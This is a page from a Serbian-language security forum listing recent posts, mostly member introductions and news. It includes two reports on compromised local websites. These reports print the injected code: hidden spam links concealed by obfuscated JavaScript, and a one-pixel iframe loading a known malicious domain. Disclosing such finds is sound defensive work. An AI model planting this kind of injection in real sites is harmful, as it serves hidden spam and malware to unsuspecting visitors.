Bezbedan Balkan

Welcome, Guest

You have to register before you can post on our site.

Search Forums

Forum Statistics

» Members: 141
» Latest member: Baya_Vanta
» Forum threads: 1,418
» Forum posts: 3,949

Full Statistics

Latest Threads

patika, fashion, itd scam...
Forum: Phishing / Scam / Spam kampanje
Last Post: milos_rs
39 minutes ago
» Replies: 88
» Views: 22,068

Kompromitovan dzbelapalan...
Forum: Kompromitovani resursi
Last Post: VincaSec
3 hours ago
» Replies: 2
» Views: 22

Kompromitovani nalozi zap...
Forum: Kompromitovani resursi
Last Post: VincaSec
3 hours ago
» Replies: 1
» Views: 14

Na prodaju je pristup nal...
Forum: Kompromitovani resursi
Last Post: VincaSec
4 hours ago
» Replies: 0
» Views: 15

Dark Web analiza minrzs.g...
Forum: Kompromitovani resursi
Last Post: VincaSec
4 hours ago
» Replies: 4
» Views: 973

Kompromitovani nalozi zap...
Forum: Kompromitovani resursi
Last Post: VincaSec
5 hours ago
» Replies: 1
» Views: 19

lovemel.rs - procurela ne...
Forum: Kompromitovani resursi
Last Post: milos_rs
Yesterday, 10:51 PM
» Replies: 0
» Views: 42

EPS - "nezapamćeni hakers...
Forum: Kompromitovani resursi
Last Post: milos_rs
Yesterday, 07:08 PM
» Replies: 89
» Views: 33,202

Javno objavljen kompromit...
Forum: Kompromitovani resursi
Last Post: milos_rs
Yesterday, 11:56 AM
» Replies: 0
» Views: 51

Kompromitovani nalozi zap...
Forum: Kompromitovani resursi
Last Post: VincaSec
05-07-2024, 06:04 PM
» Replies: 1
» Views: 79

Sakrivene reklame na contractor.rs

Posted by: 1van - 09-28-2022, 06:56 PM - Forum: Kompromitovani resursi - No Replies

Detektovano u još u martu, server Loopia: https://twitter.com/ivanmarkovicsec/stat...4906699776.

Code:
<div name="LcOkne" id="FQfMnG">

<a href="http://www.atleticoarezzo.it/">UGG Saldi</a>

<a href="http://www.associazionespazzavento.it/">Stivali UGG</a>

<a href="http://www.agendacultura.it/">UGG Saldi</a>

<a href="http://www.rumeniinitalia.it/">UGG Outlet</a>

<a href="http://www.anspilecce.it">Stivali UGG</a>

<a href="http://www.montanolucino-ut.it">UGG Outlet</a>

<a href="http://www.mtdirectionsk.it">Stivali UGG</a>

<a href="http://www.bkvietnam.dk/">UGG Sko</a>

<a href="http://www.altieco.dk/">UGG Australia</a>

<a href="http://www.vinboden.dk">Billige UGG</a>

<a href="/teletext/ralph-lauren-vaska.html" title="ralph lauren väska">ralph lauren väska</a>

<a href="/teletext/ralph-lauren-skjorta.html" title="ralph lauren skjorta">ralph lauren skjorta</a>

<a href="/teletext/ralph-lauren-jacka-herr.html" title="ralph lauren jacka herr">ralph lauren jacka herr</a>

<a href="/teletext/ralph-lauren-parfym-dam.html" title="ralph lauren parfym dam">ralph lauren parfym dam</a>

<a href="/teletext/polo-ralph-lauren-skor.html" title="polo ralph lauren skor">polo ralph lauren skor</a>

<a href="/teletext/ralph-lauren-skjorta-dam.html" title="ralph lauren skjorta dam">ralph lauren skjorta dam</a>

</div><script language="JavaScript">var _0x6977=["\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x73\x74\x79\x6C\x65","\x46\x51\x66\x4D\x6E\x47","\x64\x69\x73\x70\x6C\x61\x79","\x6E\x6F\x6E\x65"];document[_0x6977[0]](_0x6977[2])[_0x6977[1]][_0x6977[3]]=_0x6977[4]</script>

</body>

Code:
De-obfuscated code: var _0x6977 = ["getElementById", "style", "FQfMnG", "display", “none"];

Whois:

Quote:Registrant: Contractor D.O.O.
Address: Brdjanska 458, Ripanj, Beograd, Srbija
Registration number: 07487436
Tax ID (PIB): 101745588
Administrative contact: Ilmak D.O.O.
Address: Cincar Jankova 7, Beograd, Srbija
Technical contact: Loopia d.o.o.
Address: Obrenovićeva 46, TPC KALČA C1/72, Nis, Srbija
Registration number: 17503626

Zaboravljeni malware link na df.rs

Posted by: 1van - 09-28-2022, 06:47 PM - Forum: Kompromitovani resursi - No Replies

Detektovano još u Martu, server je Loopia: https://twitter.com/ivanmarkovicsec/stat...6026613761. Ako ovo nisu videli ko zna šta još ima tamo.

Code:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Frameset//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-frameset.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>

<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />

<title>Sajt u izradi</title>

</head>

<frameset rows="*">

  <frame src="http://www.loopia.co.yu/under_construction/" />

</frameset>

</html>

<iframe heigth="1" width="1" frameborder="0" src="http://alcobro.net/t.php?id=3661989"></iframe>

Domen alcobro.net se spominje na više mesta ali npr. i ovde: https://github.com/stamparm/maltrail/blo...istory.txt.

Whois:

Quote:Registrant: Df Doo
Address: Slobodna Zona Beograd, Beograd, Srbija
Registration number: 17588931
Tax ID (PIB): 103607506
Administrative contact: Df Doo
Address: Slobodna Zona Beograd, Beograd, Srbija
Technical contact: Loopia D.O.O.
Address: Obrenovićeva bb, TPC KALČA C1/72, Niš, Srbija
Registration number: 17503626

*Besplatan microsoft exam

Posted by: Ched - 09-28-2022, 02:18 PM - Forum: Seminari, predavanja, radionice, konferencije - Replies (1)

Sve od navedenog sa ove liste možete imati priliku da naučite is steknete njihov sertifikat:

Besplatno ako izdvojiš vreme da rezevišeš mesto na njihovim eventima naravno, ali kako to i gde mogu da počnem?
Don't worry I got you:
> Microsoft Events Catalog
Tu možeš naći event sa onim što vas najviše zanima, naravno tokom registracije imaćete uslove i nagrade, ovde je uslov da ima dva peredavanja što znači da 2 dana moraš izdvojiti za ostvarivanje te sertifikacije odnosno vaučera za test (vrednost je uglavnom 100$)

E sad da ne davim dalje, jedan hint- UVEK BUDI 15min pred početak eventa, da bi vas sistem pustio na event, event traje 2h30min MAX nekad i manje, cekaj kraj, posle ponovi proces
Nakon toga bi trebali da primite email sa vezanim voučerom za testiranje Smile Good luck & have fun!

cao svima

Posted by: Aleksandar.Dj. - 09-28-2022, 09:44 AM - Forum: O Vama - Replies (3)

	Zdravo, na forum sam naisao putem Ivanovog posta na linkedin-u u vezi inficiranja mreze katastra ransomware-om. Dugo sam u ITju ali sam za sigurnost krenuo tek skoro da se interesujem. Nedostaje mi vec duze neki dobar forum kao sto je bio stari elitesecurity npr. Nadam se pametnim raspravama i pozdravljam sve.

Pozdrav

Posted by: pakonja - 09-27-2022, 09:00 PM - Forum: O Vama - Replies (2)

Ivan je "krivac" sto sam ovde, forum je interesantne tematike pa verujem da ce biti dosta zanimljivih sadrzaja...

Inace, zovem se Sasa, u IT-u sam profesionalno oko 13 godina (mreze, serveri, klijentska podrska....). Amiga 500 mi je bila prva ljubav, posle sam presao na PC - Intel Pentium 133MHz sa 14400 modemom! E taj modem je krivac za sve... tada sam poceo da se kacim na BBS-ove (posebno mi se svideo 013 Electro iz Bele Crkve), posle BBS-ova se pojavilo nesto sto se zvalo dial up internet, tada sam saznao za neke cudne skracenice IRC, ICQ, MSN, e-mail, web... i eto... malo po malo - stiglo se do 13 godina u IT-u Smile

Ah da, preskocio sam period studiranja i konektovanja racunara na GPRS internet preko Siemens ME45 mobilnog telefona jer tada u studentskom domu nije postojao internet a IRC ovisnost je bila jaca od svega i jednostavno sam MORAO i tamo da imam neki internet. Ne znam mozete li zamisliti moju srecu kada sam posle brdo neprespavanih noci, citanja raznorazne dokumentacije i posle kucanja gomile AT komandi uspeo da se konektujem na GPRS i uspostavim konekciju ka IRC serveru sa racunara... Bila su to neka lepa vremena, puna istrazivanja, ucenja, informacije nisu bile na dohvat ruke kao sada i za svaku informaciju si morao bas da se pomucis da je nadjes kako bi naucio nesto novo... uhh kakav flashback...! Smile

Tol'ko od mene za sada...

Surveillance Valley

Posted by: y0d4 - 09-27-2022, 04:22 PM - Forum: Vesti, zanimljivosti i razno - No Replies

Posto je cela prica ovde oko bezbednosti, imam jednu toplu i veliku preporuku za knjigu Surveillance Valley
Kjigu je pisao rusko/americki (rodjen u RU, zivi u US - barem poslednji info koji sam dokacio) novinar, zasnovanu najvise na FOIA zahtevima (po meni nema verodostojniji izvor).

Knjiga se radi o nastanku interneta, kako je ideja rodjena u Vijetnamskom ratu, pa se pretvorio u ovo sto je danas internet.
Takodje se spominje tor, signal, open source community, crypto ... generalno dosta tema koje se ticu ovog foruma Smile
Nakon citanja ovako necega, gledacete na internet i dogadjaje na istom iz potpuno drugacije perspektive...

I da ne davim mnogo, velika preporuka za sve koga zanima istorija interneta....

AWS Outposts in Serbia

Posted by: 1van - 09-27-2022, 04:16 PM - Forum: Web, Cloud and Mobile bezbednost - Replies (12)

Quote:AWS Outposts rack can now be shipped and installed at your data center and on-premises locations in Kazakhstan and Serbia.

AWS Outposts rack, a part of the AWS Outposts family, is a fully managed service that extends AWS infrastructure, AWS services, APIs, and tools to virtually any data center or co-location space for a truly consistent hybrid experience. Outposts rack is ideal for workloads that require low latency access to on-premises systems, local data processing, and migration of applications with local system interdependencies. Outposts rack can also help meet data residency requirements.

With the availability of Outposts rack in Kazakhstan and Serbia you can use AWS services to run your workloads and data in country in your on-premises facilities and connect to your nearest AWS Region for management and operations.
To learn more about Outposts rack, read the product overview and user guide. For the most updated list of AWS Regions where Outposts rack is supported, check out the Outposts rack FAQs page.

Link: https://aws.amazon.com/about-aws/whats-n...an-serbia/

Da li neko zna gde je hostovano, koji data centar? I ko je odgovoran za bezbednost, na svim nivoima?

~~Sportski pozdrav!~~

Posted by: Ched - 09-27-2022, 03:22 PM - Forum: O Vama - Replies (3)

Velik pozdrav svima,

Moje ime je Čedomir zovite me Ched, završio kriminalističko policijsku akademija sad (univerzitet) sektor za IT i informacionu bezbednost,

Moj bio je da od malena sam voleo da učim o IT-u iz aspekta Gray-hat-a, velik sam forum junkie i uvek sam bio okružen interesantnim kolegama iz te svere Black Hat-a, napomenuo sam gray-hat jer nisam učestvovao ali sam uvek bio obavešten u sitnim detaljima tih dešavanja (Insider)

Lets get to the hot stuff, da... policijska akademija, Woohoo! Big Grin

samo ću reći da je disciplinksi fakultet prvenstveno, ali uvek su fleksibilni za ideje Bezbednosti koje mogu po njihovom postupku, (odnosno potpisom), upoznao CERT prikazao im WifiDucky kao neki wow faktor mog sveta iz Hack5

U slučaju da vas zanima nešto više o policiji, feel free da cimnete na >192, siguran sam da će odgovoriti nekad... Smile

Jos ranjivih adresa sa teritorija balkana..

Posted by: y0d4 - 09-27-2022, 11:25 AM - Forum: Neadekvatno zaštićeni resursi - Replies (1)

	Focus na CVEs: https://app.netlas.io/responses/?q=geo.c...=1&indices= netlas je slican servis shodan-u

pozdrav svima

Posted by: milos_rs - 09-27-2022, 09:30 AM - Forum: O Vama - Replies (2)

Ćao svima, Ja sam Miloš očigledno, u avgustu 2016 sam otvorio profil na twitteru da na jednom mestu bude sažeto sve vezano za pretežno lokalni infosec preko retvitova drugih a i sopstvenih istraživanja, tada nije postojao sličan profil, barem ne da je aktivan. Inače uglavnom ne istražujem aktivno nego samo nešto na šta slučajno naletim. Ideja je bila da napravim ceo sajt/blog ali mi je na kraju kratka forma twittera više prijala i manje vremena oduzima.

Na internetu sam otprilike od 1991/92. godine ne sećam se više precizno, bio je tada neki lik koji je radio u pošti u Banja Luci i imao je linux mašinu sa call-back softverom, sećam se pozovem modemom iz Beograda tu mašinu, ulogujem se i otkucam komandu da me pozove nazad i prekinem vezu, onda mašina mene zove i impulsi idu njemu, tj. idu nigde jer je radio u PTTu Smile Ta mašina je drugim linkom bila povezana sa javnim internetom preko ne znam čega i voila! Bio sam online i tu se najviše haralo po IRC-u i Gopher-om istraživao tadašnji internet, povezivalo se na .mil računare i hakovalo pre nego što je to bilo kul. Kad je ta veza sa internetom ubrzo pukla jer je zbog rata oprema uništena imao sam pristup JUPAK-u i onome što je preko njega bilo dostupno. Naravno i nezavisni lokalni BBS su tada bili aktuelni, kao i SEZAM bez PRO. Zvao sam i neki hakerski BBS u nemačkoj i skidao razne alate, kad je stigao račun za telefon više nisam Smile Onda se posle prešlo na Dial-up i ostalo je istorija...

Profesionalno sam jack-of-all-trades već više od 20 godina, najviše sam bio u sysadminskim ulogama sa solidnom dozom mreža i sigurnosti. Linuxaš sam u duši ali silom prilika mi je kroz karijeru Windows dominirao kao nužno zlo. Uvek sam bio nekako infosec orijentisan, te između ostalih uloga radim i na tome dosta u firmi kao blue team, ali nikad nisam bio u isključivo infosec ulozi, mada ciljam ka tome ili ka devops/devsecops.

to bi bilo to za sada

Pages (142): « Previous 1 … 132 133 134 135 136 … 142 Next »

Login
Username/Email:
Password:	Lost Password?
	Remember me